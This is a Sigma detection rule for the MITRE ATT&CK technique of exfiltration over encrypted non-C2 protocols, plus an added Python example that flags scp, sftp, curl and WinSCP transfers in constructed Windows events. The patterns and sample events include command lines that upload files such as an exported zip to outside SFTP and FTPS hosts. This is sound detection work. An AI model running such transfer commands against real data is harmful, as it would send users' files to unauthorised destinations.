title: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002)
id: df00tech-t1048-002
status: experimental
description: "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. Common protocols include HTTPS/TLS, SFTP, SCP, SMTPS, and FTPS. These protocols use asymmetric encryption (public-key cryptography) for key exchange, often transitioning to symmetric encryption for bulk data transfer. Because these protocols are widely used for legitimate business purposes, malicious exfiltration traffic can blend in with normal network activity. Threat actors such as APT28, CURIUM, and Storm-1811 have leveraged HTTPS, SMTPS, and SCP respectively for data exfiltration."
references:
  - https://attack.mitre.org/techniques/T1048/002/
  - https://df00tech.com/detections/T1048.002
author: df00tech
date: 2026/04/16
tags:
  - attack.t1048.002
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Stand-in for the df00tech KQL/SPL query (which could not be auto-translated), built only
  # from the tools and protocols named in this rule's description and false-positive list;
  # the previous wildcard EventID selection would have matched every process_creation event.
  selection_ssh_tools:
    Image|endswith:
      - '\scp.exe'
      - '\sftp.exe'
  selection_url_tools:
    Image|endswith:
      - '\curl.exe'
      - '\WinSCP.exe'
    CommandLine|contains:
      - 'sftp://'
      - 'ftps://'
  condition: selection_ssh_tools or selection_url_tools
falsepositives:
  - "IT administrators using WinSCP, FileZilla, or SCP for legitimate file transfers to managed servers"
  - Backup software using SFTP/FTPS to transfer data to authorized cloud storage or DR sites
  - "DevOps pipelines using Rclone or curl for legitimate artifact publishing to cloud storage (S3, Azure Blob, GCS)"
  - Security teams running vulnerability scans or transferring forensic images via SFTP
  - Software update mechanisms that download or upload telemetry over HTTPS to vendor endpoints
level: high
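Added example, not part of the df00tech rule and not its KQL/SPL query: a Python pass that applies a T1048.002-style process_creation selection to constructed Windows events. It keys on the transfer tools and encrypted non-C2 URL schemes the description names, extracts the destination host from either a URL or an scp-style `user@host:path` target, and suppresses destinations on an allowlist of managed servers so the false-positive cases listed above (backup jobs to known hosts, admin file transfers) do not fire. The sample events, the hostnames and the `MANAGED_HOSTS` allowlist are all constructed for the example.

```python
"""Added example (not df00tech's query or the rule's own logic): apply a
T1048.002 process_creation selection to constructed Windows events."""
import ntpath
import re
from urllib.parse import urlsplit

# Tools named in the rule's description / false-positive list (lower-cased basenames).
TRANSFER_TOOLS = {"scp.exe", "sftp.exe", "winscp.exe", "filezilla.exe", "rclone.exe", "curl.exe"}

# URL using one of the encrypted non-C2 schemes the description lists.
SCHEME_URL = re.compile(r"\b(?:sftp|ftps|https|smtps)://\S+", re.IGNORECASE)

# scp/sftp-style target: "user@host:path" or "dotted.host:path". The lookahead rejects
# Windows drive paths such as C:\backup, whose colon is followed by a backslash.
SCP_TARGET = re.compile(r"(?<!\S)(?:[\w.-]+@([\w.-]+)|([\w-]+(?:\.[\w-]+)+)):(?!\\)\S*")

# Hypothetical allowlist of managed destinations (the rule's backup/admin false positives).
MANAGED_HOSTS = {"backup01.corp.example", "artifacts.corp.example"}


def evaluate(event):
    """Classify one process_creation event.

    Returns (verdict, host): verdict is "alert", "suppressed" (managed destination),
    or None when the event does not match the selection at all.
    """
    image = ntpath.basename(event.get("Image", "")).lower()
    if image not in TRANSFER_TOOLS:
        return None, None
    cmd = event.get("CommandLine", "")
    host = None
    m = SCHEME_URL.search(cmd)
    if m:
        host = urlsplit(m.group(0)).hostname
    else:
        m = SCP_TARGET.search(cmd)
        if m:
            host = (m.group(1) or m.group(2)).lower()
    if not host:
        return None, None
    return ("suppressed" if host in MANAGED_HOSTS else "alert"), host


def triage(events):
    """Return the events that should alert, with the extracted destination host."""
    hits = []
    for event in events:
        verdict, host = evaluate(event)
        if verdict == "alert":
            hits.append({"Image": event["Image"], "host": host, "CommandLine": event["CommandLine"]})
    return hits


# Constructed sample events using Sysmon/4688 field names; none are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -T C:\Users\bob\Documents\export.zip sftp://files.example.net/upload/"},
    {"Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "CommandLine": r"scp.exe C:\backup\db.bak svc_backup@backup01.corp.example:/backups/"},
    {"Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "CommandLine": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe" ftps://upload@ftp.partner.example/'},
    {"Image": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"ALERT {hit['Image']} -> {hit['host']}: {hit['CommandLine']}")
```

Running the block prints the curl-to-sftp and WinSCP-to-ftps events as alerts; the scp job to the allowlisted backup host is suppressed and explorer.exe never enters the selection. Note that rclone is kept in `TRANSFER_TOOLS` for completeness but its command line names a configured remote rather than a scheme, so destination extraction for it needs the rclone config, not the process event.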
